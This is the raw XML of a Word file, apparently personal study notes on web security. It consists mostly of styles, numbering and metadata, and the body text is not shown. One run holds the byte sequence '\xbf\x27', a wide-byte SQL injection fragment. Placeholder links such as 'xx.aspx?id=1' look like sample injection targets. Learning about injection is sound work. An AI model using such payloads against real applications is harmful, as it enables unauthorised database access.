      </w:pPr>
      <w:r>
        <w:t>’\xbf\x27’</w:t>
      </w:r>
    </w:p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lastRenderedPageBreak/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C3E" w:rsidRDefault="008D0C3E" w:rsidP="0045694B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008D0C3E" w:rsidRDefault="008D0C3E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C3E" w:rsidRDefault="008D0C3E" w:rsidP="0045694B">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008D0C3E" w:rsidRDefault="008D0C3E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8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37D624A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="037E70A0"/>
    <w:lvl w:ilvl="0" w:tplc="39222AAC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4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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6F863464"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53B6E1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5"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="18"/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3"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="12"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="12"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride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9"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="1"/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21A56"/>
    <w:rsid w:val="000303C4"/>
    <w:rsid w:val="00030CD4"/>
    <w:rsid w:val="000322A3"/>
    <w:rsid w:val="00057BE4"/>
    <w:rsid w:val="000620B1"/>
    <w:rsid w:val="00071932"/>
    <w:rsid w:val="00082ACE"/>
    <w:rsid w:val="00094ECB"/>
    <w:rsid w:val="000B29AF"/>
    <w:rsid w:val="000D2343"/>
    <w:rsid w:val="000D3787"/>
    <w:rsid w:val="000D78D4"/>
    <w:rsid w:val="000F184C"/>
    <w:rsid w:val="00130DE0"/>
    <w:rsid w:val="00132BB5"/>
    <w:rsid w:val="00136C85"/>
    <w:rsid w:val="00140BF6"/>
    <w:rsid w:val="001420BA"/>
    <w:rsid w:val="00162020"/>
    <w:rsid w:val="00162816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202978"/>
    <w:rsid w:val="00246CE0"/>
    <w:rsid w:val="00264C7E"/>
    <w:rsid w:val="002756B5"/>
    <w:rsid w:val="002A0E9B"/>
    <w:rsid w:val="002A2225"/>
    <w:rsid w:val="002C7481"/>
    <w:rsid w:val="002D47A9"/>
    <w:rsid w:val="002F1717"/>
    <w:rsid w:val="003009F5"/>
    <w:rsid w:val="00310146"/>
    <w:rsid w:val="0031513A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18D9"/>
    <w:rsid w:val="00401408"/>
    <w:rsid w:val="00414F9E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816"/>
    <w:rsid w:val="004C14EA"/>
    <w:rsid w:val="004C3A4D"/>
    <w:rsid w:val="004C5BA2"/>
    <w:rsid w:val="004D044E"/>
    <w:rsid w:val="004E0AB5"/>
    <w:rsid w:val="004E4EBC"/>
    <w:rsid w:val="00501516"/>
    <w:rsid w:val="005071EC"/>
    <w:rsid w:val="00511148"/>
    <w:rsid w:val="005124D8"/>
    <w:rsid w:val="005275C7"/>
    <w:rsid w:val="00543A5B"/>
    <w:rsid w:val="00556341"/>
    <w:rsid w:val="00563DC1"/>
    <w:rsid w:val="00565D19"/>
    <w:rsid w:val="00571E2E"/>
    <w:rsid w:val="00572D13"/>
    <w:rsid w:val="005954FE"/>
    <w:rsid w:val="005A05D3"/>
    <w:rsid w:val="005B6217"/>
    <w:rsid w:val="005B715E"/>
    <w:rsid w:val="005C2440"/>
    <w:rsid w:val="005C7A7D"/>
    <w:rsid w:val="005E5F7E"/>
    <w:rsid w:val="00620120"/>
    <w:rsid w:val="0065479F"/>
    <w:rsid w:val="00661E9D"/>
    <w:rsid w:val="00681412"/>
    <w:rsid w:val="00697C07"/>
    <w:rsid w:val="006B12EC"/>
    <w:rsid w:val="006B7F02"/>
    <w:rsid w:val="006C344B"/>
    <w:rsid w:val="006C4ECE"/>
    <w:rsid w:val="006D6806"/>
    <w:rsid w:val="006E564D"/>
    <w:rsid w:val="006E7B29"/>
    <w:rsid w:val="00700865"/>
    <w:rsid w:val="00741D68"/>
    <w:rsid w:val="007531EF"/>
    <w:rsid w:val="007657E2"/>
    <w:rsid w:val="007A3920"/>
    <w:rsid w:val="007A5594"/>
    <w:rsid w:val="007D0775"/>
    <w:rsid w:val="007D74A1"/>
    <w:rsid w:val="007E2B1E"/>
    <w:rsid w:val="00802955"/>
    <w:rsid w:val="00806E53"/>
    <w:rsid w:val="00837F80"/>
    <w:rsid w:val="00850407"/>
    <w:rsid w:val="00864084"/>
    <w:rsid w:val="008A004F"/>
    <w:rsid w:val="008A35DC"/>
    <w:rsid w:val="008D0C3E"/>
    <w:rsid w:val="008E66FD"/>
    <w:rsid w:val="008E7485"/>
    <w:rsid w:val="008F0FFA"/>
    <w:rsid w:val="009102A6"/>
    <w:rsid w:val="00911B79"/>
    <w:rsid w:val="00911E7F"/>
    <w:rsid w:val="00912F6A"/>
    <w:rsid w:val="009347F9"/>
    <w:rsid w:val="009717CE"/>
    <w:rsid w:val="00974D28"/>
    <w:rsid w:val="00985CE4"/>
    <w:rsid w:val="00990028"/>
    <w:rsid w:val="00990DAA"/>
    <w:rsid w:val="00995F2B"/>
    <w:rsid w:val="009A7505"/>
    <w:rsid w:val="009C3B59"/>
    <w:rsid w:val="009C7E7E"/>
    <w:rsid w:val="009D1325"/>
    <w:rsid w:val="009D3240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63A45"/>
    <w:rsid w:val="00A64139"/>
    <w:rsid w:val="00A92387"/>
    <w:rsid w:val="00AA39CC"/>
    <w:rsid w:val="00AA5689"/>
    <w:rsid w:val="00AA6BA0"/>
    <w:rsid w:val="00AE23DC"/>
    <w:rsid w:val="00AF7813"/>
    <w:rsid w:val="00B253B8"/>
    <w:rsid w:val="00B27159"/>
    <w:rsid w:val="00B31676"/>
    <w:rsid w:val="00B3563C"/>
    <w:rsid w:val="00B4027A"/>
    <w:rsid w:val="00B52A1C"/>
    <w:rsid w:val="00B63AFF"/>
    <w:rsid w:val="00B70E80"/>
    <w:rsid w:val="00B74013"/>
    <w:rsid w:val="00B74572"/>
    <w:rsid w:val="00B75BE3"/>
    <w:rsid w:val="00B76438"/>
    <w:rsid w:val="00B7766D"/>
    <w:rsid w:val="00BA3B72"/>
    <w:rsid w:val="00BB26FF"/>
    <w:rsid w:val="00BB7E5B"/>
    <w:rsid w:val="00BD454E"/>
    <w:rsid w:val="00BD7A70"/>
    <w:rsid w:val="00BF397A"/>
    <w:rsid w:val="00C1382B"/>
    <w:rsid w:val="00C168B8"/>
    <w:rsid w:val="00C27342"/>
    <w:rsid w:val="00C31384"/>
    <w:rsid w:val="00C31FF2"/>
    <w:rsid w:val="00C46C62"/>
    <w:rsid w:val="00C53E25"/>
    <w:rsid w:val="00C8063F"/>
    <w:rsid w:val="00C81A76"/>
    <w:rsid w:val="00C866A7"/>
    <w:rsid w:val="00CD0DAD"/>
    <w:rsid w:val="00CD16D2"/>
    <w:rsid w:val="00CE24C0"/>
    <w:rsid w:val="00CF7040"/>
    <w:rsid w:val="00D0368B"/>
    <w:rsid w:val="00D06CEC"/>
    <w:rsid w:val="00D3129B"/>
    <w:rsid w:val="00D3333B"/>
    <w:rsid w:val="00D40808"/>
    <w:rsid w:val="00D45364"/>
    <w:rsid w:val="00D77A34"/>
    <w:rsid w:val="00D90E12"/>
    <w:rsid w:val="00D94E25"/>
    <w:rsid w:val="00D9527C"/>
    <w:rsid w:val="00D976A0"/>
    <w:rsid w:val="00DA2270"/>
    <w:rsid w:val="00DB157C"/>
    <w:rsid w:val="00DC0F40"/>
    <w:rsid w:val="00DD2A2D"/>
    <w:rsid w:val="00DD67DA"/>
    <w:rsid w:val="00DE7D93"/>
    <w:rsid w:val="00DF0994"/>
    <w:rsid w:val="00E02475"/>
    <w:rsid w:val="00E125A6"/>
    <w:rsid w:val="00E17B71"/>
    <w:rsid w:val="00E43E47"/>
    <w:rsid w:val="00E46749"/>
    <w:rsid w:val="00E6652B"/>
    <w:rsid w:val="00E72DBD"/>
    <w:rsid w:val="00E72EAA"/>
    <w:rsid w:val="00E9295D"/>
    <w:rsid w:val="00EA505C"/>
    <w:rsid w:val="00EA70E2"/>
    <w:rsid w:val="00EB0C04"/>
    <w:rsid w:val="00EB3236"/>
    <w:rsid w:val="00EB46BA"/>
    <w:rsid w:val="00EC226F"/>
    <w:rsid w:val="00ED2871"/>
    <w:rsid w:val="00EE5589"/>
    <w:rsid w:val="00EE70F8"/>
    <w:rsid w:val="00F03E3B"/>
    <w:rsid w:val="00F15A54"/>
    <w:rsid w:val="00F16A3F"/>
    <w:rsid w:val="00F236FC"/>
    <w:rsid w:val="00F4312B"/>
    <w:rsid w:val="00F47AE9"/>
    <w:rsid w:val="00F52B9B"/>
    <w:rsid w:val="00F70BBB"/>
    <w:rsid w:val="00F82588"/>
    <w:rsid w:val="00FB0C49"/>
    <w:rsid w:val="00FB3B4F"/>
    <w:rsid w:val="00FC16F5"/>
    <w:rsid w:val="00FD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a"/>
    <w:link w:val="1Char0"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="000B29AF"/>
    <w:pPr>
      <w:spacing w:before="160" w:after="160" w:line="480" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="2">
    <w:name w:val="笔记2级标题"/>
    <w:basedOn w:val="20"/>
    <w:next w:val="a"/>
    <w:link w:val="2Char0"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00911E7F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="14"/>
      </w:numPr>
      <w:spacing w:before="80" w:after="80" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr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0B29AF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3">
    <w:name w:val="笔记3级标题"/>
    <w:basedOn w:val="30"/>
    <w:next w:val="a"/>
    <w:link w:val="3Char0"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="006B12EC"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="14"/>
      </w:num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911E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hyperlink" Target="http://xx.aspx?id=1" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png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oleObject" Target="embeddings/oleObject1.bin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hyperlink" Target="http://xxx.asp?id=1" TargetMode="External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image" Target="media/image1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21</Pages>
  <Words>3529</Words>
  <Characters>20118</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>167</Lines>
  <Paragraphs>47</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>23600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467</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-15T08:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-10T06:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>